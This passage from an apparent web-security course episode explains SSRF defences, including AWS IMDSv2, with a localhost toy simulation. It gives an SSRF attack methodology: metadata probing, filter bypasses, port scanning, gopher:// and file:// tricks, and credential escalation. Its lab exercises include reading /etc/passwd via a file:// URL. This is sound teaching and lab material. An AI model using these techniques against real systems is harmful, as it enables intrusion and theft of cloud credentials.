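Using the built-in properties instead of a hand-maintained list also reduces the chance of forgetting a range, though an explicit allowlist of destinations is stronger still where the feature permits it.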
Beyond application-level defenses, the real fix for cloud metadata SSRF is AWS IMDSv2. IMDSv1 hands out credentials to any HTTP GET request from the instance. IMDSv2 requires a two-step process:
# IMDSv2: requires a session token first
TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" \
-H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
# Then use that token in subsequent requests
curl "http://169.254.169.254/latest/meta-data/" \
-H "X-aws-ec2-metadata-token: $TOKEN"
The PUT request with a custom header can't be sent through a simple SSRF (most SSRF only allows GET requests, and custom headers like X-aws-ec2-metadata-token-ttl-seconds are typically not controllable by the attacker). IMDSv2 effectively blocks the classic SSRF-to-metadata attack vector. AWS now recommends IMDSv2 for all instances and provides the option to disable IMDSv1 entirely.
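To see why a GET-only SSRF fails against this handshake, here is a toy simulation that runs entirely on localhost. `FakeIMDSv2` is a made-up stand-in that mimics only the token flow described above. It is not the real service and makes no claim about its other behaviour:

```python
import secrets
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

TOKENS = set()

class FakeIMDSv2(BaseHTTPRequestHandler):
    """Toy model of the token handshake; NOT the real metadata service."""
    def do_PUT(self):
        if (self.path == "/latest/api/token"
                and self.headers.get("X-aws-ec2-metadata-token-ttl-seconds")):
            token = secrets.token_hex(16)
            TOKENS.add(token)
            self._reply(200, token)
        else:
            self._reply(400, "bad request")

    def do_GET(self):
        if self.headers.get("X-aws-ec2-metadata-token") in TOKENS:
            self._reply(200, "iam/\nhostname\n")
        else:
            self._reply(401, "unauthorized")

    def _reply(self, status, body):
        data = body.encode()
        self.send_response(status)
        self.send_header("Content-Length", str(len(data)))
        self.end_headers()
        self.wfile.write(data)

    def log_message(self, *args):   # keep the demo output quiet
        pass

server = HTTPServer(("127.0.0.1", 0), FakeIMDSv2)   # port 0 = any free port
threading.Thread(target=server.serve_forever, daemon=True).start()
base = f"http://127.0.0.1:{server.server_port}"
opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))  # no proxies

def call(method, path, headers=None):
    req = urllib.request.Request(base + path, method=method, headers=headers or {})
    try:
        with opener.open(req, timeout=5) as resp:
            return resp.status, resp.read().decode()
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode()

# What a GET-only SSRF can send: a bare GET without custom headers
ssrf_status, _ = call("GET", "/latest/meta-data/")

# What code on the instance does: PUT for a token, then GET with it
_, token = call("PUT", "/latest/api/token",
                {"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
ok_status, listing = call("GET", "/latest/meta-data/",
                          {"X-aws-ec2-metadata-token": token})
server.shutdown()
server.server_close()
print("bare GET:", ssrf_status, "| token flow:", ok_status)
```

The protection rests on the attacker not controlling the method or headers. An SSRF that does allow both (for instance through a gopher:// payload) would still get through, which is why least-privilege IAM roles remain necessary.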
Having said that, many organizations still run IMDSv1 either because they haven't migrated, because legacy applications depend on it, or because they don't know it's a problem. The Capital One breach happened in 2019 -- IMDSv2 was released in November 2019, partly in response to that exact breach. It's 2026 now and the migration is still incomplete across the industry.
Putting It All Together: The SSRF Attack Methodology
- Identify URL-handling features: URL preview, image proxy, webhooks, PDF generation, import-from-URL, RSS feeds, API integrations that fetch external data
- Test basic SSRF: Try http://127.0.0.1, http://localhost, and http://169.254.169.254 as input. Check if the response contains internal data
- Test filter bypasses: If basic addresses are blocked, try decimal IPs, hex IPs, IPv6, DNS wildcards, URL parsing tricks
- Enumerate internal services: Use SSRF to port-scan internal ranges (10.x.x.x, 172.16.x.x, 192.168.x.x)
- Attack cloud metadata: If the application runs in AWS/GCP/Azure, try the metadata endpoints. Check for IMDSv1 vs IMDSv2
- Test protocol handlers: Try file://, gopher://, dict:// -- different protocols unlock different attack capabilities
- Check for blind SSRF: If you can't see responses, use out-of-band detection (Burp Collaborator, DNS canaries)
- Escalate access: Cloud credentials from metadata can be used to access storage, databases, other services. Internal admin panels may have further vulnerabilities.
We've been working through application-level web vulnerabilities since episode 11. SQL injection, XSS, CSRF, authentication bypass, and now SSRF -- each one exploits a different trust boundary, and each one chains with the others. The web attack surface is a layered system where every vulnerability class multiplies the impact of every other class. Applications don't just process data -- they handle data in complex formats, accept structured input that can carry payloads, and trust that the data they receive is what it claims to be.
Exercises
Exercise 1: Set up the SSRF vulnerable Flask application from this episode. Exploit it to: (a) read the /internal/secrets endpoint, (b) scan ports 80, 22, 3306, 5432, 8080 on the local machine using the timing-based approach (check which respond vs timeout), (c) attempt to read a local file using the file:// protocol (?url=file:///etc/passwd). Document which attacks succeeded and which were blocked by the requests library's default behavior. Save your findings in ~/lab-notes/ssrf-attacks.md.
Exercise 2: Add SSRF protection to the vulnerable Flask app: implement the is_safe_url() function from this episode. Then test ALL the bypass techniques listed (IPv6, decimal IP, DNS wildcard services, URL parsing tricks). Which bypasses still work? Which are blocked? Identify the remaining gaps in the protection and propose additional defenses. Save the hardened app as ~/ssrf-lab/ssrf_protected.py.
Exercise 3: Research the Capital One breach (2019) in detail. Write a technical analysis in ~/lab-notes/capital-one-ssrf.md covering: (a) the exact attack chain from SSRF to data exfiltration, (b) what AWS IMDSv2 is and how it would have prevented the attack, (c) what IAM permissions the compromised role had (and what it should have had under the principle of least privilege), (d) what the total financial and legal cost was. Conclude with: what three changes would have prevented this breach?